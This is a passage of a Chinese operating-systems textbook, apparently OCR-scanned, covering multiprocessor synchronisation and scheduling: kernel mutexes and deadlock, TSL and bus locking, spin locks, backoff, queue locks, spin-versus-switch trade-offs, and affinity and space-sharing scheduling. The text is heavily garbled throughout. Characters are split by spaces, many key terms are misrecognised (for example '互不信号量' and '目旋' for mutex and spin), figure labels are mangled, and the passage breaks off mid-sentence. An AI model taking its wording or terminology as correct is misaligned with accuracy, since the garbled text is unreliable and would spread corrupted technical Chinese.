也 市 来 了 目 身 的 问题 。 特 别 是 ， 当 两 个 或 更 多 的 CPU 同时 运行 操作 系 
统 代 码 时 ， 就 会 出 现 灾 难 。 想 象 有 两 个 CPU 同时 选择 相同 的 进程 运行 
或 请 求 同 一 个 空间 存 储 器 页 面 。 人 处 理 这 些 问题 的 最 简单 方法 是 在 操作 
系统 中 使 用 互 不 信号 量 ( 锁 ) ， 使 整个 系统 成 为 一 个 大 临界 区 。 当 一 
个 CPU 要 运行 操作 系统 时 ， 它 必须 首先 获得 互 扩 信号 量 。 如 有 果 互 斤 信 
号 量 被 锁 住 ， 就 得 等 待 。 按 照 这 种 方式 ， 任 何 CPU 都 可 以 运行 操作 系 
统 ， 但 在 任 一 时 刻 只 有 一 个 CPU 可 运行 操作 系统 。 


这 个 模型 征 可 以 工作 的 ， 但 是 它 几 乎 同 主 从 模式 一 样 糟糕 。 同 样 
假设 ， 如 果 所 有 时 间 的 10% 人 花费 在 操作 系统 内 部 。 那 么 在 有 20 个 CPU 
时 ， 会 出 现 等 待 进入 的 CPU 长 队 。 笠 运 的 是 ， 比 较 容 易 进 行 改进 。 操 
作 系统 中 的 很 多 部 分 是 彼此 独立 的 。 例 如 ， 在 一 个 CPU 运行 调度 程序 
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名， 这 种 运行 方式 是 没有 问题 的 。 


一 事实 使 得 把 操作 系统 分 割 成 互 不 影响 的 临界 区 。 每 个 临界 区 
由 其 互 斥 信号 量 保护 ， 所 以 一 次 只 有 一 个 CPU 可 执行 它 。 采 用 这 种 方 
式 ， 可 以 实现 更 多 的 并 行 操 作 。 而 某 些 表格 ， 如 进程 表 ， 可 能 恰巧 被 
多 个 临界 区 使 用 。 例 如 ， 在 调度 时 需要 进程 表 ， 在 系统 fork 调 用 和 信和 号 
处 理 时 也 都 需要 进程 表 。 多 临界 区 使 用 的 每 个 表格 ， 都 需要 有 各 自 的 
互 斥 信号 量 。 通 过 这 种 方式 ， 可 以 做 到 每 个 临界 区 在 任 一 个 时 刻 只 被 
一 个 CPU 执行 ， 而 且 在 任 一 个 时 刻 每 个 临界 表 (critical table) 也 只 被 
一 个 CPU 访问 。 


大 多 数 的 现代 多 处 理 机 都 采用 这 种 安排 。 为 这 类 机 器 编写 操作 系 

统 的 困难 ， 不 在 于 其 实际 的 代码 与 普通 的 操作 系统 有 多 大 的 不 同 ， 而 
在 于 如 何 将 其 划分 为 可 以 由 不 同 的 CPU 并 行 执行 的 临界 区 而 互 不 干 
扰 ， 即 使 以 细小 的 、 间 接 的 方式 。 男 外 ， 对 于 被 两 个 或 多 个 临界 区 使 
用 的 表 必 须 通 过 互 不 信号 量 分 别 加 以 保护 ， 而 且 使 用 这 些 表 的 代码 必 
须 正确 地 运用 互 不 信号 量 。 


更 进一步 ， 必 须 格外 小 心地 避免 死 锁 。 如 果 两 个 临界 区 都 需要 表 A 
和 表 B， 其 中 一 个 首先 申请 A， 另 一 个 首先 申请 B， 那 么 玉 早 会 发 生死 
锁 ， 而 且 没 有 人 知道 为 什么 会 发 生死 锁 。 理 论 上 ， 所 有 的 表 可 以 被 赋 
予 整数 值 ， 而 且 所 有 的 临界 区 都 应 该 以 升序 的 方式 获得 表 。 这 一 策略 


避免 了 死 锁 ， 但 是 需要 程序 员 非 常 仔细 地 考虑 每 个 临界 区 需要 哪个 
表 ， 以 便 按照 正确 的 次 序 安排 请 求 。 


由 于 代码 是 随 着 时 间 演 化 的 ， 所 以 也 许 有 个 临界 区 需要 一 张 过 去 
不 需要 的 新 表 。 如 果 程 序 员 是 新 接手 工作 的 ， 他 不 了 解 系统 的 整个 逻 
辑 ， 那 么 可 能 只 是 在 他 需要 的 时 候 获得 表 ， 并 且 在 不 需要 时 释放 掉 。 
尽管 这 看 起 来 合 理 的 ， 但 是 可 能 会 导致 死 锁 ， 即 用 户 会 觉察 到 系统 
被 凝固 住 了 。 要 做 正确 并 不 容易 ， 而 且 要 在 程序 员 不 断 更 换 的 数 年 时 
间 之 内 始终 保持 正确 性 太 困 难 了 。 


8.1.3 ”多 处 理 机 同步 


在 多 处 理 机 中 CPU 经 常 需要 同步 。 这 里 刚刚 看 到 了 内 核 临 界 区 和 
表 被 互 不 信号 量 保 护 的 情形 。 现 在 让 我 们 仔细 看 看 在 多 处 理 机 中 这 种 
同步 古 如 何 工作 的 。 正 如 我 们 将 看 到 的 ， 它 远 不 是 那么 无 足 轻 重 。 


开始 讨论 之 前 ， 还 需要 引入 同步 原 语 。 如 有 果 一 个 进程 在 单 处 理 机 
( 仅 含 一 个 CPU) 中 需要 访问 一 些 内 核 临 界 表 的 系统 调用 ， 那 么 内 核 
代码 在 接触 该 表 之 前 可 以 先 蔡 止 中 断 。 然 后 它 继 续 工 作 ， 在 相关 工作 
完成 之 前 ， 不 会 有 任何 其 他 的 进程 溜 进 来 访问 该 表 。 在 多 处 理 机 中 ， 
荣 止 中 断 的 操作 只 影响 到 完成 茜 止 中 断 操 作 的 这 个 CPU， 其 他 的 CPU 
继续 运行 并 且 可 以 访问 临界 表 。 因 此 ， 必 须 采 用 一 种 合适 的 互 不 信号 
量 协议 ， 而 且 所 有 的 CPU 都 齐 守 该 协议 以 保证 互 矿 工作 的 进行 。 


任何 实用 的 互 斥 信号 量 协议 的 核心 都 一 条 特殊 指令 ， 该 指令 人 允 
许 检 测 一 个 存储 占 字 并 以 一 种 不 可 见 的 操作 设置 。 我 们 来 看 看 在 图 2-22 
中 使 用 的 指令 TSL (Test and Set Lock) 是 如 何 实现 临界 区 的 。 正 如 我 
们 先前 讨论 的 ， 这 条 指令 做 的 是 ， 读 出 一 个 存储 融 字 并 把 它 存储 在 一 
个 寄存 名 中 。 同 时 ， 它 对 该 存储 需 字 写 入 一 个 1 《或 某 些 非 零 值 ) 。 当 
然 ， 这 需要 两 个 总 线 周期 来 完成 存储 器 的 读 写 。 在 单 处 理 机 中 ， 只 
该 指令 不 被 中 途中 断 ，TSL 指 令 就 始终 照常 工作 。 


现在 考虑 在 一 个 多 处 理 机 中 发 生 的 情况 。 在 图 8-10 中 我 们 看 到 了 最 
坏 情 况 的 时 序 ， 其 中 存储 器 字 1000， 被 用 作 一 个 初始 化 为 0 的 锁 。 第 1 
步 ，CPU 1 读 出 该 字 得 到 一 个 0。 第 2 步 ， 在 CPU 1 有 机 会 把 该 字 写 为 1 
之 前 ，CPU 2 进入 ， 并 且 也 读 出 该 字 为 0。 第 3 步 ，CPU 1 把 1 写 入 该 
字 。 人 第 4 步 ，CPU 2 也 把 1 写 入 该 字 。 两 个 CPU 都 由 TSL 指 令 得 到 0， 所 
以 两 者 都 对 临界 区 进行 访问 ， 并 且 互 不 失败 。 


初始 化 为 0 


1.CPU 1 读 一 个 0 


3.CPU 1 写 一 个 1 4.CPU 2 写 一 个 1| ig 


图 8-10 如 果 不 能 锁 住 总 线 ，TSL 指 令 会 失效 。 这 里 的 四 步 解释 了 失 
效 情况 


为 了 阻止 这 种 情况 的 发 生 ，TSL 指 令 必 须 首 移 锁 住 总 线 ， 阻 止 其 他 
的 CPU 访问 它 ， 然 后 进行 存储 郁 的 读 写 访问 ， 再 解 山 总 线 。 对 总 线 加 
锁 的 典型 做 法 是 ， 先 使 用 通常 的 总 线 协议 请 求 总 线 ， 并 申明 (设置 一 
个 逻辑 1) 已 拥有 某 些 特定 的 总 线 线路 ， 直 到 两 个 周期 全 部 完成 。 只 要 
始终 保持 拥有 这 一 特定 的 总 线 线路 ， 那 么 其 他 CPU 束 不 会 得 到 总 线 的 
访问 权 。 这 个 指令 只 有 在 拥有 必要 的 线路 和 和 使 用 它们 的 〈 硬 件 ) 协 


议 上 才能 实现 。 现 代 总 线 有 这 些 功能 ， 但 是 早期 的 一 些 总 线 不 具备 ， 
它们 不 能 正确 地 实现 TSL 指 令 。 这 就 是 Peterson 协 议 (完全 用 软件 实现 
同步 ) 会 产生 的 原因 (Peterson, 1981) ° 


如 条 正确 地 实现 和 使 用 TSL， 它 能 够 剑 证 互 矿 机制 正 浓 工作 。 但 是 
这 种 互 斥 方 法 使 用 了 自 旋 锁 (spin lock) ， 因 为 请 求 的 CPU 只 是 在 原 地 
尽 可 能 快 地 对 锁 进 行 循环 测试 。 这 样 做 不 仅 完 全 浪费 了 提出 请 求 的 各 
个 CPU 的 时 间 ， 而 且 还 给 总 线 或 存储 占 增 加 了 大 量 的 负载 ， 闻 重地 降 
低 了 所 有 其 他 CPU 从 事 正常 工作 的 速度 。 


乍 一 看 ， 高 速 缓存 的 实现 也 许 能 够 消除 总 线 竞 争 的 问题 ， 但 事实 
并 非 如 此 。 理 论 上 ， 只 要 提出 请 求 的 CPU 已 经 读 取 了 锁 字 (lock 
word) ， 它 就 可 在 其 高 速 缓存 中 得 到 一 个 副本 。 只 要 没有 其 他 CPU 试 
图 使 用 该 锁 ， 提 出 请 求 的 CPU 束 能 够 用 完 其 高 速 组 存 。 当 拥有 锁 的 
CPU 写 入 一 个 1 到 高 速 缓存 并 释放 它 时 ， 高 速 缓存 协议 会 自动 地 将 它 在 
远程 高 速 缓存 中 的 所 有 副本 失效 ， 要 求 再 次 读 取 正 确 的 值 。 


问题 是 ， 高 速 缓存 操作 是 在 32 或 64 字 节 的 块 中 进行 的 。 通 常 ， 拥 
有 锁 的 CPU 也 需要 这 个 锁 周 围 的 字 。 由 于 TSL 指 令 是 一 个 写 指令 (因为 
它 修改 了 锁 ) ， 所 以 它 需 要 互 斥 地 访问 含有 锁 的 高 速 缓存 块 。 这 样 ， 
每 一 个 TSL 都 使 锁 持 有 者 的 高 速 缓存 中 的 块 失效 ， 并 且 为 请 求 的 CPU 取 
一 个 私有 的 、 惟 一 的 副本 。 只 要 锁 拥 有 者 访问 到 该 锁 的 邻接 字 ， 该 高 
速 缓 存 块 就 被 送 进 其 机 器 。 这 样 一 来 ， 整 个 包含 锁 的 高 速 缓 存 块 束 会 


不 断 地 在 锁 的 拥有 者 和 锁 的 请 求 者 之 间 来 回 穿 梭 ， 导 致 了 比 单个 读 取 
一 个 锁 字 更 大 的 总 线 流 量 。 


如 果 能 消除 在 请 求 一 侧 的 所 有 由 TSL3 引 起 的 写 操作 ， 我 们 就 可 以 明 
显 地 减少 这 种 开销 。 使 提出 请 求 的 CPU 首 先进 行 一 个 纯 读 操作 来 观察 
尔 是 否 空 几 ， 束 可 以 实现 这 个 目标 。 只 有 在 锁 看 来 是 空间 时 ，TSL 才 真 
正 去 获取 它 。 这 种 小 小 变化 的 结 膝 是， 大 多 数 的 行为 变 成 读 而 不 是 
写 。 如 有 果 拥 有 锁 的 CPU 只 是 在 同一 个 高 速 缓存 块 中 读 取 各 种 变量 ， 那 
么 它们 每 个 都 可 以 以 共享 只 读 方 式 拥有 一 个 高 速 缓存 块 的 副本 ， 这 就 
消除 了 所 有 的 高 速 缓存 块 传送 。 当 锁 最 终 被 释放 时 ， 锁 的 所 有 者 进行 
写 操作 ， 这 需要 排 它 访问 ， 也 束 使 远程 高 速 缓存 中 的 所 有 其 他 副本 失 
效 。 在 提出 请 求 的 CPU 的 下 一 个 读 请 求 中， 高 速 缓存 块 会 被 重新 装 
载 。 注 意 ， 如 果 两 个 或 更 多 的 CPU 竞争 同一 个 锁 ， 那 么 有 可 能 出 现 这 
样 的 情况 ， 两 者 同时 看 到 锁 是 空 几 的 ， 于 是 同时 用 TSL 指 令 去 获得 它 。 
只 有 其 中 的 一 个 会 成 功 ， 所 以 这 里 没有 苋 争 条 件 ， 因 为 真正 的 获取 套 
由 TSL 指 令 进 行 的， 而 且 这 条 指令 是 原子 性 的 。 即 使 看 到 了 馈 空 几 ， 然 
后 立即 用 TSL 指 令 试图 获得 它 ， 也 不 能 保证 真正 得 到 它 。 其 他 CPU 可 能 
会 取胜 ， 不 过 对 于 该 算法 的 正确 性 来 说 ， 谁 得 到 了 锁 并 不 重要 。 纯 读 
出 操作 的 成 功 只 是 意味 着 这 可 能 是 一 个 获得 锁 的 好 时 机 ， 但 并 不 能 确 
保 能 成 功 地 得 到 锁 。 


男 一 个 减少 总 线 流量 的 方式 是 使 用 著名 的 以 太 网 二 进 制 指数 补偿 
算法 (binary exponential backoff algorithm) (Anderson, 1990) 。 不 是 
采用 连续 轮 询 ， 参 考 图 2-22， 而 是 把 一 个 延迟 循环 插入 轮 询 之 间 。 初 始 
的 延迟 是 一 条 指令 。 如 果 锁 仍然 已 ， 延 迟 被 加 倍 成 为 两 条 指令 ， 然 
后 ， 四 条 指令 ， 如 此 这 样 进行 ， 直 到 某 个 最 大 值 。 当 锁 释 放 时 ， 较 低 
的 最 大 值 会 产生 快速 的 响应 。 但 是 会 浪费 较 多 的 总 线 周 期 在 高 速 缓存 
RISE Lo 而 较 高 的 最 大 值 可 城 少 高 速 缓存 的 颠 艇 ， 但 是 其 代价 是 不 
会 注意 到 锁 如 此 迅速 地 成 为 空间 。 二 进 制 指数 补偿 算法 无 论 在 有 或 无 
TSL 指 令 前 的 纯 读 的 情况 下 都 适用 。 


一 个 更 好 的 思想 是 ， 让 每 个 打算 获得 互 斥 信号 量 的 CPU 都 拥有 各 
自用 于 测试 的 私有 锁 变 量 ， 如 图 8-11 所 示 〈Mellor-Crummey 和 Scott， 
1991) 。 有 关 的 变量 应 该 存放 在 未 使 用 的 高 速 缓存 块 中 以 避免 冲突 。 
对 这 种 算法 的 描述 如 下 : 给 一 个 未 能 获得 锁 的 CPU 分 配 一 个 锁 变 量 并 
且 把 它 附 在 等 待 该 锁 的 CPU 链表 的 末端 。 在 当前 锁 的 持 有 者 退出 临界 
区 时 ， 它 释放 链表 中 的 首 个 CPU 正在 测试 的 私有 锁 (在 自己 的 高 速 绥 
FP) 。 然 后 该 CPU 进入 临界 区 。 操 作 完成 之 后 ， 该 CPU 释放 锁 。 其 
后 继 者 接着 使 用 ， 以 此 类 推 。 尺 管 这 个 协议 有 些 复杂 (为 了 避免 两 个 
CPU 同时 把 它们 自己 加 在 链表 的 末端 ) ， 但 它 能 够 有 效 工作 ， 而 且 消 
除了 饥饿 问题 。 具 体 细节 ， 读 者 可 以 参考 有 关 论 文 。 
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目 旋 与 切换 


到 目前 为 止 ， 不 论 是 连续 轮 询 方式 、 间 歇 轮 询 方式 ， 还 是 把 自己 
附 在 进行 等 候 CPU 链 表 中 的 方式 ， 我 们 都 假定 需要 加 锁 的 互 斥 信号 量 
的 CPU 只 是 保持 等 待 。 有 时 对 于 提出 请 求 的 CPU 而 言 ， 只 有 等 待 ， 不 
存在 其 他 替代 的 办 法 。 例 如 ， 假 设 一 些 CPU 是 空闲 的 ， 需 要 访问 共享 
的 就 绪 链表 (ready list) 以 便 选 择 一 个 进程 运行 。 如 果 就 绪 链 表 被 锁 住 
了 ， 那 么 CPU 就 不 能 够 只 是 决定 暂停 其 正在 进行 的 工作 ， 而 去 运行 另 
一 个 进程 ， 因 为 这 样 做 需要 访问 就 绪 链表 。CPU 必 须 保 持 等 待 直到 能 
够 访问 该 就 绪 链 表 。 


然而 ， 在 另外 一 些 情形 中 ， 却 存在 看 别 的 选择 。 例 如 ， 如 采 在 一 
个 CPU 中 的 某 些 线程 需要 访问 文件 系统 缓冲 区 高 速 缓存 ， 而 该 文件 系 
统 缓冲 区 高 速 缓存 正好 锁 住 了 ， 那 么 CPU 可 以 决定 切换 至 另外 一 个 线 
程 而 不 是 等 待 。 有 关 是 进行 目 施 还 是 进行 线程 切换 的 问题 则 是 许多 研 
完 课 题 的 内 容 ， 下 面 会 讨论 其 中 的 一 部 分 。 请 注意 ， 这 类 问题 在 单 处 
理 机 中 征 不 存在 的 ， 因 为 没有 另 一 个 CPU 释放 锁 ， 那 么 目 旋 吏 没有 任 
何 意义 。 如 果 一 个 线程 试图 取得 锁 并 且 失 败 ， 那 么 它 总 是 被 阻塞 ， 这 
样 锁 的 所 有 着 有 机 会 运行 和 释放 该 锁 。 


假设 日 旋 和 进行 线程 切换 部 是 可 行 的 选择 ， 则 可 进行 如 下 的 权 
衡 。 目 旋 直 接 浪 费 了 CPU 周 期 。 重复 地 测试 锁 并 不 是 高 效 的 工作 。 不 
过 ,切换 也 痕 费 了 CPU 周 期 ， 因 为 必须 保存 当前 线程 的 状态 ， 必 须 获 
得 傈 护 吏 绪 链 表 的 锁 ， 还 必须 选择 一 个 线程 ， 必 须 装 入 其 状态 ， 并 且 
使 其 开始 运行 。 更 进一步 来 说 ， 该 CPU 高 速 缓存 还 将 包含 所 有 不 合适 
的 高 速 缓存 块 ， 因 此 在 线程 开始 运行 的 时 候 会 发 生 很 多 代价 昂贵 的 高 
速 缓存 林 命 中 。TLB 的 失效 也 是 可 能 的 。 最 后 ， 会 发 生 返 回 至 原来 线 
程 的 切换 ， 随 之 而 来 的 是 更 多 的 高 速 缓存 未 命中 。 人 花费 在 这 两 个 线程 
间 来 回 切 换 和 所 有 高 速 缓存 未 命中 的 周期 时 间 都 浪费 了 。 


如 琳 预 完 知道 互 不 信号 量 通 闸 被 挂 有 的 时 间 ， 比 如 是 50ps， 而 从 
当前 线程 切换 需要 1ms， 稍 后 切换 返回 还 需 1ms， 那 么 在 互 不 信和 号 量 上 
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会 发 生 相 当 大 的 变化 ， 所 以 ， 哪 一 种 方法 更 好 些 呢 ? 


有 一 种 设计 是 总 是 进行 自 旋 。 第 二 种 设计 方案 则 总 是 进行 切换 。 
而 第 三 种 设计 方案 是 每 当 明 到 一 个 锁 住 的 互 不 信号 量 时 ， 束 单独 做 出 
决定 。 在 必须 做 出 决定 的 有 时刻， 并 不 知道 目 旋 和 切换 哪 一 种 方案 更 
好 ， 但 是 对 于 任何 给 定 的 系统 ， 有 可 能 对 其 所 有 的 有 关 活 动 进行 跟 
中 ,并 且 随 后 进行 离线 分 析 。 然 后 束 可 以 确定 哪个 决定 最 好 及 在 最 好 
情形 下 所 浪费 的 时 间 。 这 种 事后 算法 (hindsight algorithm) 成 为 对 可 行 


算法 进行 测量 的 基准 评测 标准 。 


已 有 研究 人 员 对 上 述 这 一 问题 进行 了 研究 (Karlin A, 1989; 
Karlin 等 人 ，1991; Ousterhout, 1982) 。 多 数 的 研究 工作 使 用 了 这 样 
个 模型 : 一 个 未 能 获得 互 斥 信号 量 的 线程 自 旋 一 段 时 间 。 如 果 时 间 
超过 某 个 阐 值 ， 则 进行 切换 。 在 某 些 情形 下 ， 该 闹 值 是 一 个 定 值 ， 典 
型 值 是 切换 至 男 一 个 线程 再 切换 回来 的 开销 。 在 男 一 些 情形 下 ， 该 阐 
值 是 动态 变化 的 ， 它 取决 于 所 观察 到 的 等 待 互 斥 信号 量 的 历史 信息 。 


在 系统 跟 踩 奉 干 最 新 的 目 旋 时 间 并 且 假 定 当 前 的 情形 可 能 会 同 先 
前 的 情形 类 似 时 ， 束 可 以 得 到 最 好 的 结 末 。 例 如 ， 假 定 还 是 lms 切 换 时 
间 ， 线 程 目 旋 时 间 最 长 为 2ms， 但 和 要 观察 实际 上 目 旋 了 多 长 时 间 。 如 
革 线 程 来 能 获取 锁 ， 并 且 发 现在 之 前 的 三 轮 中 ， 平 均等 竺 时 间 为 
200hs， 那 么 ， 在 切换 之 前 就 应 该 完 目 旋 2ms。 但 是 ， 如 琳 发 现在 先前 


的 每 次 尝试 中 ， 线 程 都 自 旋 了 整整 2ms， 则 应 该 立即 切换 而 不 再 自 旋 。 
更 多 的 细节 可 以 在 (Karlin 等 人 ，1991) 中 找到 。 


8.1.4 多 处 理 机 调度 


在 探讨 多 处 理 机 调度 之 前 ， 需 要 确定 调度 的 对 象 是 什么 。 过去， 
当 所 有 进程 都 是 单个 线程 的 时 候 ， 调 度 的 单位 是 进程 ， 因 为 没有 其 他 
什么 可 以 调度 的 。 所 有 的 现代 操作 系统 都 文 持 多 线程 进程 ， 这 让 调度 


变 得 更 加 复杂 。 


线程 是 内 核 线程 还 是 用 户 线程 至 天 重要 。 如 采 线 程 征 由 用 户 空 间 
库 维 护 的 ， 而 对 内 核 不 可 见 ， 那 么 调度 一 如 既往 的 基于 单个 进程 。 如 
果 内 核 并 不 知道 线程 的 存在 ， 它 束 不 能 调度 线程 。 


对 内 核 线程 来 说 ， 情 况 有 所 不 同 。 在 这 种 情况 下 所 有 线程 均 是 内 
核 可 见 的 ， 内 核 可 以 选择 一 个 进程 的 任 一 线程 。 在 这 样 的 系统 中 ， 发 
展 趋势 是 内 核 选 择 线程 作为 调度 单位 ， 线 程 从属 的 那个 进程 对 于 调度 
算法 只 有 很 少 的 JERA) 影响 。 下 面 我 们 将 探讨 线程 调度 ， 当 
然 ， 对 于 一 个 单线 程 进程 (single-threaded process) 系统 或 者 用 户 空间 
线程 ， 调 度 单位 依然 是 进程 。 


进程 和 线程 的 选择 并 不 是 调度 中 的 惟一 问题 。 在 单 处 理 机 中 ， 调 
度 是 一 维 的 。 惟 一 必须 (不 断 重复 地 ) 回答 的 问题 是 :“ 接 下 来 运行 的 
线程 应 该 是 哪 一 个 ? ”而 在 多 人 处理 机 中 ， 调 度 是 二 维 的 。 调 度 程序 必须 


决定 哪 一 个 进程 运行 以 及 在 哪 一 个 CPU 上 运行 。 这 个 在 多 处 理 机 中 增 
加 的 维 数 大 大 增加 了 调度 的 复杂 性 。 


另 一 个 造成 复杂 性 的 因素 是 ， 在 有 些 系统 中 所 有 的 线程 是 不 相关 
的 ， 而 在 另外 一 些 系统 中 它们 是 成 组 的 ， 同 属于 同一 个 应 用 并 且 协 同 
工作 。 前 一 种 情形 的 例子 是 分 时 系统 ， 其 中 独立 的 用 户 运行 相互 独立 
的 进程 。 这 些 不 同 进程 的 线程 之 间 没 有 关系 ， 因 此 其 中 的 每 一 个 都 可 
以 独立 调度 而 不 用 考虑 其 他 的 线程 。 


后 一 种 情形 的 例子 通常 发 生 在 程序 开发 环境 中 。 大 型 系统 中 通常 
有 一 些 供 实际 代 码 使 用 的 包含 安 、 类 型 定义 以 及 变量 声明 等 内 容 的 头 
文件 。 当 一 个 头 文 件 改变 时 ， 所 有 包含 它 的 代码 文件 必须 被 重新 纺 
译 。 通 常 make 程 序 用 于 管理 开发 工作 。 调 用 make 程 序 时 ， 在 考虑 了 头 
文件 或 代码 文件 的 修改 之 后 ， 它 仅 编译 那些 必须 重新 编译 的 代码 文 
件 。 仍 然 有 效 的 日 标 文件 不 再 重新 生成 。 


make 的 原始 版 本 是 顺序 工作 的 ， 不 过 为 多 处 理 机 设计 的 新 版 本 可 
以 一 次 启动 所 有 的 编译 。 如 果 需 要 10 个 编译 ， 那 么 迅速 对 9 个 进行 调度 
而 让 最 后 一 个 在 很 长 的 时 间 之 后 才 进行 的 做 法 没有 多 大 意义 ， 因 为 直 
到 最 后 一 个 线程 完毕 之 后 用 户 才 感 觉 到 工作 完成 了 。 在 这 种 情况 下 ， 
将 进行 编译 的 线程 看 作 一 组 ， 并 在 对 其 调度 时 考虑 到 这 一 点 是 有 意义 
HA) ° 


让 我 们 首先 讨论 调度 独立 线程 的 情况 。 稍 后 ， 我 们 将 考虑 如 何 调 
度 相关 的 线程 。 处 理 独立 线程 的 最 简单 算法 是 ， 为 就 绪 线 程 维 护 一 个 
系统 级 的 数据 结构 ， 它 可 能 只 是 一 个 链表 ， 但 更 多 的 情况 下 可 能 是 对 
应 不 同 优先 级 一 个 链表 和 集合， 如 图 8-12a 所 示 。 这 里 16 个 CPU 正 在 忙 
克 ， 有 不 同 优先 级 的 14 个 线程 在 等 待 运行 。 第 一 个 将 要 完成 其 当前 工 
作 (或 其 线程 将 被 阻塞 ) 的 CPU 是 CPU 4， 然 后 CPU 4 锁 住 调度 队列 
(scheduling queue) 并 选择 优先 级 最 高 的 线程 A， 如 图 8-12b 所 示 。 接 
A, CPU 12 空 内 并 选择 线程 B， 参 见 图 8-12c。 只 要 线程 完全 无 关 ， 以 
这 种 方式 调度 是 明智 的 选择 并 且 其 很 容易 高 效 地 实现 。 
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图 8-12 使 用 单一 数据 结构 调度 一 个 多 处 理 机 


由 所 有 CPU 使 用 的 单个 调度 数据 结构 分 时 共享 这 些 CPU， 正 如 它 
们 在 一 个 单 处 理 机 系统 中 那样 。 它 还 支持 目 动 负载 平衡 ， 因 为 决 不 会 


出 现 一 个 CPU 空 几 而 其 他 CPU 过 载 的 情况 。 不 过 这 一 方法 有 两 个 缺 
上 护 ， 一 个 是 随 着 CPU 数 量 增加 所 引起 的 对 调度 数据 结构 的 次 在 竞争 ， 
二 是 当 线 程 由 于 MO 阻塞 时 所 引起 上 下 文 切 换 的 开销 (overhead) 。 


在 线程 的 时 间 片 用 完 时 ， 也 可 能 发 生 上 下 文 切换 。 在 多 处 理 机 中 
它 有 一 些 在 单 处 理 机 中 不 存在 的 属性 。 假 设 某 个 线程 在 其 时 间 片 用 完 
时 持 有 一 把 目 旋 锁 。 在 该 线程 被 再 次 调度 并 且 释放 该 锁 之 前 ， 其 他 等 

待 该 目 旋 锁 的 CPU 只 是 把 时 间 溪 费 在 目 放 上。 在 单 处 理 机 中 ， 极 少 采 
用 目 旋 锁 ， 因 此 ， 如 采 持 有 互 斤 信号 量 的 一 个 线程 被 挂 起 ， 而 万 一 个 
线程 启动 并 试图 获取 该 互 斥 信号 量 ， 则 该 线程 会 立即 被 阻塞 ， 这 样 只 
浪费 了 少量 时 间 。 


为 了 避免 这 种 异 冲 情 况 ， 一 些 系统 采用 智能 调度 (smart 
scheduling) 的 方法 ， 其 中 ， 获 得 了 自 旋 锁 的 线程 设置 一 个 进程 范围 内 
的 标志 以 表示 它 目 前 拥有 了 一 个 自 旋 锁 (Zahorjan 等 人 ，1991) ° SE 
释放 该 自 旋 锁 时 ， 束 清除 这 个 标志 。 这 样 调度 程序 就 不 会 停止 持 有 自 
旋 锁 的 线程 ， 相 反 ， 调 度 程序 会 给 予 稍微 多 一 些 的 时 间 让 该 线程 完成 
临界 区 内 的 工作 并 释放 上 自 旋 锁 。 


调度 中 的 男 一 个 主要 问题 是 ， 当 所 有 CPU 平 等 时 ， 某 些 CPU 更 平 
o 特别 是 ， 当 线程 A 已 经 在 CPU k 上 运行 了 很 长 一 段 时 间 时 ，CPU k 
的 高 速 缓存 装 满 了 A 的 块 。 者 A 很 快 重新 开始 运行 ， 那 么 如 果 它 在 CPU 
k 上 运行 性 能 可 能 会 更 好 一 些 ， 因 为 k 的 高 速 缓存 也 许 还 存 有 A 的 一 些 


块 。 预 装 高 速 缓存 块 将 提高 高 速 缓存 的 命中 率 ， 从 而 提高 了 线程 的 速 
度 。 另 外 ，TLB 也 可 能 含有 正确 的 页 面 ， 从 而 减少 了 TLB 和 失效 。 


有 些 多 处 理 机 考虑 了 这 一 因素 ， 并 使 用 了 上 所谓 杀 和 调度 (affinity 
scheduling) 〈Vaswani 和 Zahorjan，1991) 。 其 基本 思想 是 ， 尽 量 使 一 
个 线程 在 它 前 一 次 运行 过 的 同一 个 CPU 上 运行 。 创 建 这 种 亲和力 
(affinity) 的 一 种 途径 是 采用 一 种 两 级 调度 算法 (two-level scheduling 
algorithm) 。 在 一 个 线程 创建 时 ， 它 被 分 给 一 个 CPU， 例 如 ， 可 以 基于 
哪 一 个 CPU 在 此 刻 有 最 小 的 负载 。 这 种 把 线程 分 给 CPU 的 工作 在 算法 
的 顶层 进行 ， 其 结果 是 每 个 CPU 获得 了 自己 的 线程 集 。 


线程 的 实际 调度 工作 在 算法 的 底层 进行 。 它 由 每 个 CPU 使 用 优先 
级 或 其 他 的 手段 分 别 进行 。 通 过 试图 让 一 个 线程 在 其 生命 周期 内 在 同 
一 个 CPU 上 运行 的 方法 ， 高 速 缓存 的 亲和力 得 到 了 最 大 化 。 不 过 ， 如 
果 某 一 个 CPU 没有 线程 运行 ， 它 便 选 取 另 一 个 CPU 的 一 个 线程 来 运行 
而 不 是 空转 。 


两 级 调度 算法 有 三 个 优点 。 第 一 ， 它 把 负载 大 致 平均 地 分 配 在 可 
用 的 CPU 上 ; 第 二 ， 它 尽 可 能 发 挥 了 高 速 缓存 亲和力 的 优势 ， 第 三 ， 
通过 为 每 个 CPU 提 供 一 个 私有 的 刺 绪 线程 链表 ， 使 得 对 就 绪 线 程 链表 
的 竞争 减 到 了 最 小 ， 因 为 试图 使 用 为 一 个 CPU 的 就 绪 线 程 链 表 的 机 会 
相对 较 小 。 


当 线程 之 间 以 某 种 方式 彼此 相关 时 ， 可 以 使 用 其 他 多 处 理 机 调度 
方法 。 前 面 我 们 斤 述 过 的 并 行 make 束 是 一 个 例子 。 经 常 还 有 一 个 线程 
创建 多 个 共同 工作 的 线程 的 情况 发 生 。 例 如 当 一 个 进程 的 多 个 线程 间 
频繁 地 进行 通信 ， 让 其 在 同一 时 间 执 行 就 显得 尤为 重要 。 在 多 个 CPU 
上 同时 调度 多 个 线程 称 为 空间 共享 (space sharing) ° 


最 简单 的 空间 共享 算法 是 这 样 工作 的 。 假 设 一 组 相关 的 线程 是 一 
次 性 创建 的 。 在 其 创建 的 时 刻 ， 调 度 程序 检查 是 否 有 同 线程 数量 一 样 
多 的 空间 CPU 存 在 。 如 果 有 ， 每 个 线程 获得 各 自 专 用 的 CPU ( 非 多 道 
程序 处 理 ) 并 且 都 开始 运行 。 如 果 没 有 足够 的 CPU， 融 没有 线程 开始 
运行 ， 直 到 有 足够 的 CPU 时 为 止 。 每 个 线程 保持 其 CPU 直到 它 终 止 ， 
并 且 该 CPU 被 送 回 可 用 CPU 池 中 。 如 宁 一 个 线程 在 1O 上 阻塞 ， 它 继续 
保持 其 CPU， 而 该 CPU 惑 空 亲 直 到 该 线程 被 唤醒 。 在 下 一 批 线程 出 现 
时 ， 应 用 同样 的 算法 。 


在 任何 一 个 时 刻 ， 全 部 CPU 被 静态 地 划分 成 看 干 个 分 区 ， 每 个 分 
区 都 运行 一 个 进程 中 的 线程 。 例 如 ， 在 图 8-13 中 ， 分 区 的 大 小 是 4、6、 
